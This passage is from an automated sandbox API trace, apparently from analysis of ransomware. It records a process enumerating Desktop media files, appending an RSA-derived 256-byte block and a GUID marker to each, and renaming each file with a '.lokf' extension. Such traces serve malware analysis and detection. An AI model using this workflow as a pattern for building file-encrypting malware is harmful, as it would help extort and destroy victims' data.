[0058.669] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0058.669] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0058.670] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x9714, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.670] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.670] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.670] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.670] CloseHandle (hObject=0x5cc) returned 1 [0058.671] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0058.671] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x890) returned 0x3268798 [0058.671] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\PxUe0Rd33Z0Hx10IeT1.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pxue0rd33z0hx10iet1.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\PxUe0Rd33Z0Hx10IeT1.avi.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pxue0rd33z0hx10iet1.avi.lokf")) returned 1 [0058.672] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b199ca0, ftCreationTime.dwHighDateTime=0x1d4c95c, ftLastAccessTime.dwLowDateTime=0x28af6960, ftLastAccessTime.dwHighDateTime=0x1d4d22e, ftLastWriteTime.dwLowDateTime=0x28af6960, ftLastWriteTime.dwHighDateTime=0x1d4d22e, nFileSizeHigh=0x0, nFileSizeLow=0xe990, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PYWZYi4ZS-zguXaIZa.m4a", cAlternateFileName="PYWZYI~1.M4A")) returned 1 [0058.672] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0058.672] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8a50 [0058.672] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\PYWZYi4ZS-zguXaIZa.m4a") returned=".m4a" [0058.672] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\PYWZYi4ZS-zguXaIZa.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pywzyi4zs-zguxaiza.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.672] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=59792) returned 1 [0058.672] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.674] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xe96a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.674] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.675] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.675] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xe990, lpOverlapped=0x0) returned 1 [0058.675] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.675] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.675] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.675] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.675] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b89c8) returned 1 [0058.676] CryptCreateHash (in: hProv=0x6b89c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.676] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.676] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.676] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.676] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.676] GetLastError () returned 0x0 [0058.676] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.676] CryptReleaseContext (hProv=0x6b89c8, dwFlags=0x0) returned 1 [0058.676] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.676] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.676] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.676] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.677] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0058.677] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0058.677] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xe990, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.677] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.677] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.677] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.678] CloseHandle (hObject=0x5cc) returned 1 [0058.679] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0058.679] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x890) returned 0x3268798 [0058.679] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\PYWZYi4ZS-zguXaIZa.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pywzyi4zs-zguxaiza.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\PYWZYi4ZS-zguXaIZa.m4a.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pywzyi4zs-zguxaiza.m4a.lokf")) returned 1 [0058.680] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2005db70, ftCreationTime.dwHighDateTime=0x1d4c8a9, ftLastAccessTime.dwLowDateTime=0xf90a9030, ftLastAccessTime.dwHighDateTime=0x1d4cafe, ftLastWriteTime.dwLowDateTime=0xf90a9030, ftLastWriteTime.dwHighDateTime=0x1d4cafe, nFileSizeHigh=0x0, nFileSizeLow=0xdab6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="P_559lEWKFJGdNawoW.jpg", cAlternateFileName="P_559L~1.JPG")) returned 1 [0058.680] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0058.680] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8a50 [0058.680] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\P_559lEWKFJGdNawoW.jpg") returned=".jpg" [0058.680] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\P_559lEWKFJGdNawoW.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\p_559lewkfjgdnawow.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.681] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=55990) returned 1 [0058.681] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.682] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xda90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.682] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.683] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.683] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xdab6, lpOverlapped=0x0) returned 1 [0058.683] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.683] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.683] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.683] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.683] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b89c8) returned 1 [0058.684] CryptCreateHash (in: hProv=0x6b89c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.684] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.684] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.684] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.684] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.684] GetLastError () returned 0x0 [0058.684] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.684] CryptReleaseContext (hProv=0x6b89c8, dwFlags=0x0) returned 1 [0058.684] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.684] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.684] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.684] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.685] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0058.685] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0058.685] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xdab6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.685] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.685] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.685] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.685] CloseHandle (hObject=0x5cc) returned 1 [0058.686] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0058.686] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x890) returned 0x3268798 [0058.686] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\P_559lEWKFJGdNawoW.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\p_559lewkfjgdnawow.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\P_559lEWKFJGdNawoW.jpg.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\p_559lewkfjgdnawow.jpg.lokf")) returned 1 [0058.687] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64df4910, ftCreationTime.dwHighDateTime=0x1d4c599, ftLastAccessTime.dwLowDateTime=0x63d6a3f0, ftLastAccessTime.dwHighDateTime=0x1d4c59f, ftLastWriteTime.dwLowDateTime=0x63d6a3f0, ftLastWriteTime.dwHighDateTime=0x1d4c59f, nFileSizeHigh=0x0, nFileSizeLow=0x11a1f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QXU6sWcq.flv", cAlternateFileName="")) returned 1 [0058.687] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0058.687] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x3289860 [0058.688] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\QXU6sWcq.flv") returned=".flv" [0058.688] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\QXU6sWcq.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qxu6swcq.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.688] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=72223) returned 1 [0058.688] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.689] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x119f9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.689] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.690] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.690] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x11a1f, lpOverlapped=0x0) returned 1 [0058.690] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.690] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.690] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.691] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.691] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0058.691] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.691] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.691] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.691] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.691] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.691] GetLastError () returned 0x0 [0058.691] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.691] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0058.691] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.691] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.692] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.692] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.692] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0058.692] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0058.692] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x11a1f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.692] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.693] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.693] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.693] CloseHandle (hObject=0x5cc) returned 1 [0058.694] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269658 [0058.694] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x870) returned 0x3268798 [0058.694] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\QXU6sWcq.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qxu6swcq.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\QXU6sWcq.flv.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qxu6swcq.flv.lokf")) returned 1 [0058.695] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, 